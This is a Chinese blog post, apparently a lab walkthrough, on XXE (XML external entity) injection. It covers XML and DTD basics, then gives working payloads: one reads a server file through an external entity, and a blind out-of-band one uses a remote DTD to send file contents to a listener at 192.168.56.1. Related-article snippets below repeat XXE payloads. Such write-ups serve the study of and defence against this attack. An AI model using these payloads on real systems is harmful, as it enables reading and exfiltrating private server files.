xxe漏洞与Blind_xxe

最新推荐文章于 2024-09-14 10:24:09 发布
最新推荐文章于 2024-09-14 10:24:09 发布
阅读量826 收藏 12
点赞数 11
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52696043/article/details/137795729
版权

xxe漏洞

xml外部实体化注入漏洞

xml实例

xml文档实例

<?xml version="1.0" encoding="UTF-8"?> //文档头
<site>//副标签
  <name>RUNOOB</name>//字标签
  <url>https://www.runoob.com</url>
  <logo>runoob-logo.png</logo>
  <desc>编程学习网站</desc>
</site>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE person [
<!ELEMENT person (#PCDATA|name|addr|tel|email)*>
<!ELEMENT name (#PCDATA)>
<!ELEMENT addr (#PCDATA)>
<!ELEMENT tel (#PCDATA)>
<!ELEMENT email (#PCDATA)>
]> -- dtd
<person>Chan
	<name>Jason</name>
	<addr>Shanghai</addr>
	<tel>18701772821</tel>
	<email>1368628966@qq.com</email>
	<email>18701772821@163.com</email>
</person> -- xml

这里的dtd就是xml的内部实体
在xml中所有的标签名称都可以自定义

<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd"> -- 外部包含
<note>
  <to>Tove</to>
  <from>Jani</from>
  <heading>Reminder</heading>
  <body>Don't forget me this weekend!</body>
</note>

<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>

了解完这些就可以尝试判断靶场中是否存在xxe

xxe回显文件读取

传入

<a>aaaaa<a>

查看回显

image.png

得知,回显式xxe

可以尝试引入外部实体读取文件

<?xml version="1.0"?>
<!DOCTYPE as [
<!ENTITY f SYSTEM "/www/wwwroot/pk/.user.ini">
]>
<a>&f;</a>

读取成功

image.png

通过外部实体读取文件需要知道文件的绝对路径

<?xml version="1.0"?>
<!DOCTYPE as [
<!ENTITY f SYSTEM "/www/wwwroot/pk/.user.ini">]>
<a>&f;</a>

也可以通过http协议读取文件信息。

xxe无回显文件读取

当xxe无回显时,可以尝试通过协议外带信息

payload:

test.dtd

<!ENTITY % file SYSTEM "file:///www/wwwroot/pk/.user.ini">
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://192.168.56.1:8082/%file;'>">
%all;

load

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % remote SYSTEM "http://192.168.56.1:8000/test.dtd">
%remote;
%send;
]>

在dtd文件中实体file通过file://伪协议读取本地信息,第二个实体all定义了一个内部实体send,他用于发起一个http请求,并且file的参数被传入了url后面

当这个DTD被解析时,file 实体会加载指定文件的内容,然后 all 实体的扩展会导致 send 实体被解析,尝试向指定的URL发送一个HTTP请求,请求的路径中包含 file 实体加载的文件内容

我们只要监听端口就可以获得文件的信息

image.png

Neko 205
关注
XXE漏洞
qq_43668710的博客
06-10 398
文章目录XML基础简单介绍基本语法XXE简单介绍攻击危害防御方案 XML基础 简单介绍 XML 指可扩展标记语言(eXtensible Markup Language),是一种用于标记电子文件使其具有结构性的标记语言,被设计用来传输和存储数据。 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。目前,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVG header)应用比较广泛。 XML 的语法规范由 DTD (Docume
关于Blind XXE
weixin_30268071的博客
07-08 858
关于Blind XXE 关于XXE,很早之前内部做过分享,个人觉得漏洞本身没太多的玩点,比较有意思主要在于:不同语言处理URI的多元化和不同XML解析器在解析XML的一些特性。 在科普Blind XXE之前,假定你们已经掌握了XXE,了解了 XML, Entity, DCOTYPE, DTD等这些基础知识。 Blind XXE的原理和利用方式我在wooyun上的漏洞报告:鲜...
Webug4.0-XXE/Blind XXE注入
baynk的博客
11-27 1201
0x01 XXE注入 似乎这种基础靶场里面都没有blind xxe,看来得赶紧进入一步学习了。 贴一个基础链接XXE漏洞学习 随便输入啥都行,会出现一段代码。 直接在登陆的地方输入下列xml代码 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///...
XXE漏洞以及Blind XXE总结
热门推荐
Exploit的小站~
05-10 5万+
 转载请注明出处:http://blog.csdn.net/u011721501 0、前言 XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XEE漏洞的基础上,发展出了BlindXXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVGheader)应用比较广泛,此外,网上有一些在线XML格式...
XXE技巧拓展】————5、XXE漏洞以及Blind XXE总结
Fly_鹏程万里
12-25 1081
前言 XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XEE漏洞的基础上,发展出了BlinXXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVG header)应用比较广泛,此外,网上有一些在线XML格式化工具也存在过问题,如开源中国的在线XML格式化工具XXE漏洞: http://www.wo...
XXE及Blind_OOB_XXE
壊壊的诱惑你的博客
10-06 2022
前言: 对于XXE始终是只知其意没实际利用过,再次重新学习一遍XXE。 XML: 在学习XXE之前要理解XML,关于XML的知识点网上很多,我只介绍关于XXE的相关概念,XXE的时候有三个关键词: XML声明 <?xml version ="1.0" encoding="UTF-8"?> DTD文档定义类型。 文档元素 <foo><no...
XXE漏洞详解
weixin_56714714的博客
07-25 7827
XXE 什么是XXE? ​ XXE全程xml外部实体,从安全角度来讲,由此引发的漏洞称之为XML外部实体攻击 XML作为一种使用较为广泛的数据传输格式,很多应用程序都包含有处理xml数据的代码, 许多过时或配置不当的XML处理器都会对外部实体进行引用,如果攻击者可以上传XML文档或者在XML文档 中添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器,XXE漏洞的出现和开发语言无关 只要是应用程序中对XML数据做了解析,而且这些数据又受用户控制,那么应用程序都可能受到XXE攻击 什么是XML?
WEB漏洞——XXE
qq_63594215的博客
04-12 910
本次文章主要介绍XXE漏洞的原理,利用以及防御的过程,另外还有介绍一点XML的基础知识,详情请见下文。a) xml,eXtensible Markup Language,可扩展标记语言,是一种标记语言,使用简单标记描述数据b) xml是一种非常灵活的语言,没有固定的标签,所有标签都可以自定义c) 通常,xml被用于信息的传递和记录,因此,xml经常被用于充当配置文件如果把HTML和XML进行对比的话,HTML进行对比的话,HTML旨在显示数据信息,而XML旨在用来进行数据的传输和存储。
(渗透学习)XXE漏洞原理 & 挖掘 & 利用 & 防御
yang1234567898的博客
01-15 5840
1、什么是XML? xml和html结构类似,不同的是: XML 被设计用来传输和存储数据。 HTML 被设计用来显示数据。 XML 文档结构包括 XML 声明、DTD 文档类型定义(可选)、文档元素 (1)什么是DTD? 文档类型定义(DTD)可定义合法的XML文档构建模块,它使用一系列合法的元素来定义文档的结构。 DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 ① 内部的 DOCTYPE 声明: <!DOCTYPE 根元素 [元素声明]> 如下就
xxe漏洞简介
u011066706的专栏
04-17 4138
xxe漏洞无法复现原因 主要是simplexml_load_file这个函数的问题,在旧版本中是默认解析实体的,但是在新版本中,已经不再默认解析实体了,需要在simplexml_load_file函数中指定第三个参数为LIBXML_NOENT,不然不会解析实体的。 xxe实体注入详解 0x00背景 XXE Injection即XML External Entity Injec
XXE详解
qq_48904485的博客
03-22 5533
一、XML基础知识 1、XML简介: XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 XML 和 HTML 为不同的目的而设计: XML 被设计用来传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。 2、XML 语法 1)XML 声明文件的可选部分,如果存在需要放在文
XXE blind 简单poc & 读文件
3569
03-27 3180
原理简介: https://blog.csdn.net/u011721501/article/details/43775691 首先你要确定是xml格式的数据,content-type是xml,PHP和JAVA利用有点不一样 PHP 利用方式 读取文件POC 利用: 自己vps放置 xxe.xml <!ENTITY % payload SYSTEM "php://fil...
浅析无回显的XXE(Blind XXE
蚁景网安学院
05-11 1301
XML是一种非常流行的标记语言,在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。 外部实体对于在文档中创建动态引用非常有用,这样对引用资源所做的任何更改都会在文档中自动更新。 但是,在处理外部实体时,可以针对应用程序启动许多攻击。
XXE漏洞及Blind XXE练习
Shinpachi8的博客
12-04 4318
XXE漏洞及Blind XXE实例。 详细说明。
XXE xml实体注入
4ct10n
11-03 6442
1.科普ENTITY 实体 在一个甚至多个XML文档中频繁使用某一条数据,我们可以预先定义一个这条数据的“别名”,即一个ENTITY,然后在这些文档中需要该数据的地方调用它。 XML定义了两种类型的ENTITY,一种在XML文档中使用,另一种作为参数在DTD文件中使用。 ENTITY的定义语法: <!DOCTYPE 文件名 [ <!ENTITY 实体名 "实体内容">
网络安全(黑客技术)2024年三个月自学手册
最新发布
2401_85026116的博客
09-14 3043
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
XXE漏洞深度解析与实战演练
本文档详细介绍了XXE(XML External Entity)漏洞的概念、危害、检测方法、利用技巧以及修复策略,并提供了多个实际案例进行演示。XXE漏洞主要发生在使用XML解析器处理用户输入的场景,攻击者可以通过构造恶意的XML...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值